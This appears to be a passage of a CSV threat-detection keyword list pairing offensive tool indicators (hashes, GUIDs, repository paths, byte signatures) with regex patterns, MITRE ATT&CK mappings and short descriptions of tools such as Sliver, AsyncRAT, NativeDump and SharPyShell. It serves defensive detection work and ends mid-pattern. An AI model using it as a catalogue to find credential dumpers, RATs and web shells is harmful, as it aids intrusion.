"*0dbce336ba4f98f26b89fc110bee0b43aed24002c2fba5df9a7675d168aad12d*",".{0,1000}0dbce336ba4f98f26b89fc110bee0b43aed24002c2fba5df9a7675d168aad12d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0DD419E5-D7B3-4360-874E-5838A7519355*",".{0,1000}0DD419E5\-D7B3\-4360\-874E\-5838A7519355.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*0de61f6d712f44fd8337794c3d933d3e0de24bae9235383904541997c604b47a*",".{0,1000}0de61f6d712f44fd8337794c3d933d3e0de24bae9235383904541997c604b47a.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*0DE8DA5D-061D-4649-8A56-48729CF1F789*",".{0,1000}0DE8DA5D\-061D\-4649\-8A56\-48729CF1F789.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" 
"*0DF38AD4-60AF-4F93-9C7A-7FB7BA692017*",".{0,1000}0DF38AD4\-60AF\-4F93\-9C7A\-7FB7BA692017.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*0DF612AE-47D8-422C-B0C5-0727EA60784F*",".{0,1000}0DF612AE\-47D8\-422C\-B0C5\-0727EA60784F.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*0dfd57cb8299edf2e4a941d39ba787960de83f00b57c4f885bb141782a3b559b*",".{0,1000}0dfd57cb8299edf2e4a941d39ba787960de83f00b57c4f885bb141782a3b559b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0e26255b8db0b2e2792225febc5d3adeebc02edff523e90156c76b5baf7ee9b3*",".{0,1000}0e26255b8db0b2e2792225febc5d3adeebc02edff523e90156c76b5baf7ee9b3.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - 
T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*0e2e76930ff8d2bea66b82db863243f3895d39e761893eb6de025325747774b6*",".{0,1000}0e2e76930ff8d2bea66b82db863243f3895d39e761893eb6de025325747774b6.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*0e34604b09472922b088573ae7b8a2686982b05900251f861912e3d9d2760980*",".{0,1000}0e34604b09472922b088573ae7b8a2686982b05900251f861912e3d9d2760980.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0e3e7f92c7f8f10535a6a15079813e2b8a3f5e4cfc00a275d2a2e917539306d2*",".{0,1000}0e3e7f92c7f8f10535a6a15079813e2b8a3f5e4cfc00a275d2a2e917539306d2.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*0E4BAB8F-E6E0-47A8-8E99-8D451839967E*",".{0,1000}0E4BAB8F\-E6E0\-47A8\-8E99\-8D451839967E.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows 
boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*0e5ae252e2597d44f6e8def9fcdd3562954130a0261776e083959d067795c450*",".{0,1000}0e5ae252e2597d44f6e8def9fcdd3562954130a0261776e083959d067795c450.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*0e643bd5e3eaf43f5eee053904a24dac9bf05150885fcb32a606ef3ee1c7db1f*",".{0,1000}0e643bd5e3eaf43f5eee053904a24dac9bf05150885fcb32a606ef3ee1c7db1f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0e744d477bb40e89af274ecf70c339b9674699e4bfe984b5dd73a2b877369d48*",".{0,1000}0e744d477bb40e89af274ecf70c339b9674699e4bfe984b5dd73a2b877369d48.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*0e8dfd9cc5fcd99e4ee93d4c015e49dd672ac1813c0270c4ff3ed8c1b9db85d1*",".{0,1000}0e8dfd9cc5fcd99e4ee93d4c015e49dd672ac1813c0270c4ff3ed8c1b9db85d1.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*0ea533dd75837182416f5ffa7f51a36d82c407587068d0404c177f18709ffa63*",".{0,1000}0ea533dd75837182416f5ffa7f51a36d82c407587068d0404c177f18709ffa63.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0ebce776a2758cb99ecc9a6ba97fc432e40925fbe1a4e068bbc7a273f6064269*",".{0,1000}0ebce776a2758cb99ecc9a6ba97fc432e40925fbe1a4e068bbc7a273f6064269.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0ec459ed281c0ee777046a0a31b59500843a74f776a459a12438d6412f146001*",".{0,1000}0ec459ed281c0ee777046a0a31b59500843a74f776a459a12438d6412f146001.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0ecd88de5d2728034f25bc04fcf9553198453fb46bbb93a00a74e6e74747435b*",".{0,1000}0ecd88de5d2728034f25bc04fcf9553198453fb46bbb93a00a74e6e74747435b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0ed7071221412e55b8fa13a88d21ef523186e621acfb3cf3fe0dd292c0a25951*",".{0,1000}0ed7071221412e55b8fa13a88d21ef523186e621acfb3cf3fe0dd292c0a25951.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0ed8c3f90c77356f7d02574491f66586b96552efd0b6ef53d7de263893061bc5*",".{0,1000}0ed8c3f90c77356f7d02574491f66586b96552efd0b6ef53d7de263893061bc5.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*0evilpwfilter*",".{0,1000}0evilpwfilter.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - 
T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*0evilpwfilter.dll*",".{0,1000}0evilpwfilter\.dll.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*0evilpwfilter.dll*",".{0,1000}0evilpwfilter\.dll.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*0f0840b7da6f223c52f15ae1793c5a2942ce0d09ff493967b497a5d839eaaaa5*",".{0,1000}0f0840b7da6f223c52f15ae1793c5a2942ce0d09ff493967b497a5d839eaaaa5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0f2d3c56a917f455906ba339ee8058b5f89138b8605b673eb669c1c6d0bebb5e*",".{0,1000}0f2d3c56a917f455906ba339ee8058b5f89138b8605b673eb669c1c6d0bebb5e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0f56c703e9b7ddeb90646927bac05a5c6d95308c8e13b88e5d4f4b572423e036*",".{0,1000}0f56c703e9b7ddeb90646927bac05a5c6d95308c8e13b88e5d4f4b572423e036.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" 
"*0f5c81f14171b74fcc9777d302304d964e63ffc2d7b634ef023a7249d9b5d875*",".{0,1000}0f5c81f14171b74fcc9777d302304d964e63ffc2d7b634ef023a7249d9b5d875.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*0f62d209e39c648d15f268c68056e5f309d5eb6c7b0eff890f5ccaf9a0e12b96*",".{0,1000}0f62d209e39c648d15f268c68056e5f309d5eb6c7b0eff890f5ccaf9a0e12b96.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0f7390905abc132889f7b9a6d5b42701173aafbff5b8f8882397af35d8c10965*",".{0,1000}0f7390905abc132889f7b9a6d5b42701173aafbff5b8f8882397af35d8c10965.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0f84fb1ee028a12de7b7dfd282528b61ee8f248d8f4a6ea1ba8ea186dc0a06a0*",".{0,1000}0f84fb1ee028a12de7b7dfd282528b61ee8f248d8f4a6ea1ba8ea186dc0a06a0.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0fa2d98ba9b3da4ccc9fbc07e0e9f29aea12fe878ad83dd0c8c83564849433e4*",".{0,1000}0fa2d98ba9b3da4ccc9fbc07e0e9f29aea12fe878ad83dd0c8c83564849433e4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0fa31c8c34a370931d8ffe8097e998f778db63e2e036fbd7727a71a0dcf5d28c*",".{0,1000}0fa31c8c34a370931d8ffe8097e998f778db63e2e036fbd7727a71a0dcf5d28c.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*0fd11529bb961c342b925e156dbda40de75d4d9e823da6136ecb849b74b81e6a*",".{0,1000}0fd11529bb961c342b925e156dbda40de75d4d9e823da6136ecb849b74b81e6a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0FE0D049-F352-477D-BCCD-ACBF7D4F6F15*",".{0,1000}0FE0D049\-F352\-477D\-BCCD\-ACBF7D4F6F15.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/cjm00n/EvilSln","1","0","N/A","10","5","402","56","2023-10-30T06:57:24Z","2023-10-11T07:39:59Z" "*0vercl0k/udmp-parser*",".{0,1000}0vercl0k\/udmp\-parser.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","172","24","2024-02-25T13:18:10Z","2022-01-30T18:56:21Z" "*0x00-0x00*",".{0,1000}0x00\-0x00.{0,1000}","offensive_tool_keyword","Github Username","Github pentester username with lots of different exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/0x00-0x00","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*0x00G/NiceRAT*",".{0,1000}0x00G\/NiceRAT.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*0x09AL/DNS-Persist*",".{0,1000}0x09AL\/DNS\-Persist.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*0x09AL/IIS-Raid*",".{0,1000}0x09AL\/IIS\-Raid.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*0x4d, 0x44, 0x4d, 0x50, 0x93, 0xa7, 0x00, 
0x00*",".{0,1000}0x4d,\s0x44,\s0x4d,\s0x50,\s0x93,\s0xa7,\s0x00,\s0x00.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*0x4d, 0x44, 0x4d, 0x50, 0x93, 0xa7, 0x00, 0x00*",".{0,1000}0x4d,\s0x44,\s0x4d,\s0x50,\s0x93,\s0xa7,\s0x00,\s0x00.{0,1000}","offensive_tool_keyword","nanodump","nanodump string minidump","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*0x9999997B3deF7b69c09D7a9CA65E5242fb04a764*",".{0,1000}0x9999997B3deF7b69c09D7a9CA65E5242fb04a764.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*0xb4, 0x27, 0xb4, 0x97, 0xb1, 0xa5, 0xf3, 0x45, 0x68, 0x30, 0x3, 0x10, 0x74, 0x3c, 0x2, 0x0, 0x21, 0x7a, 0x4b, 0x8a, 0x12, 0x7b, 0xc5, 0x1a, 0xf, 0x7f, 0xf8, 0x13, 0x55, 0x7b, 0xce, 0x3a, 0x10, 0xa, 0xca, 0x47, 0x3c, 0x18, 0x5e, 0xc0, 0x78, 0x30, 0x15, 0x46, 0xfa, 0x6, 0x79, 0xaf, 0x9b, 0x4f, 0x20, 0x31, 0x31, 0x69, 0x48, 0x71, 0x83, 0x88, 0x38, 0x2d, 0x51, 0x90, 0x95, 0xdf, 0x28, 0x19, 0x26, 0x7b, 0xc5, 0x1a, 0x4f, 0xbc, 0x31, 0x7d, 0x5, 0x32, 0x95, 0xe3, 0xb0, 0xca, 0x41, 0x35, 0x6c, 0x18, 0xd4, 0xb7, 0x46, 0x1d, 0x10, 0x76, 0xe3, 0x1e, 0xc3, 0x27, 0x2f, 0x37, 0xca, 0xd, 0x13, 0xc, 0x69, 0xe0, 0xa1, 0x17, 0x7d, 0x93, 0x99, 0x10, 0xfc, 0x6, 0xf2, 0x10, 0x76, 0xe5, 0x3, 0x79, 0xa6, 0x7f, 0x42, 0x81, 0xe1, 0x72, 0x84, 0xa1, 0x3d, 0x3, 0x40, 0xf4, 0x54, 0xb0, 
0x24, 0x86, 0x7e, 0x79*",".{0,1000}0xb4,\s0x27,\s0xb4,\s0x97,\s0xb1,\s0xa5,\s0xf3,\s0x45,\s0x68,\s0x30,\s0x3,\s0x10,\s0x74,\s0x3c,\s0x2,\s0x0,\s0x21,\s0x7a,\s0x4b,\s0x8a,\s0x12,\s0x7b,\s0xc5,\s0x1a,\s0xf,\s0x7f,\s0xf8,\s0x13,\s0x55,\s0x7b,\s0xce,\s0x3a,\s0x10,\s0xa,\s0xca,\s0x47,\s0x3c,\s0x18,\s0x5e,\s0xc0,\s0x78,\s0x30,\s0x15,\s0x46,\s0xfa,\s0x6,\s0x79,\s0xaf,\s0x9b,\s0x4f,\s0x20,\s0x31,\s0x31,\s0x69,\s0x48,\s0x71,\s0x83,\s0x88,\s0x38,\s0x2d,\s0x51,\s0x90,\s0x95,\s0xdf,\s0x28,\s0x19,\s0x26,\s0x7b,\s0xc5,\s0x1a,\s0x4f,\s0xbc,\s0x31,\s0x7d,\s0x5,\s0x32,\s0x95,\s0xe3,\s0xb0,\s0xca,\s0x41,\s0x35,\s0x6c,\s0x18,\s0xd4,\s0xb7,\s0x46,\s0x1d,\s0x10,\s0x76,\s0xe3,\s0x1e,\s0xc3,\s0x27,\s0x2f,\s0x37,\s0xca,\s0xd,\s0x13,\s0xc,\s0x69,\s0xe0,\s0xa1,\s0x17,\s0x7d,\s0x93,\s0x99,\s0x10,\s0xfc,\s0x6,\s0xf2,\s0x10,\s0x76,\s0xe5,\s0x3,\s0x79,\s0xa6,\s0x7f,\s0x42,\s0x81,\s0xe1,\s0x72,\s0x84,\s0xa1,\s0x3d,\s0x3,\s0x40,\s0xf4,\s0x54,\s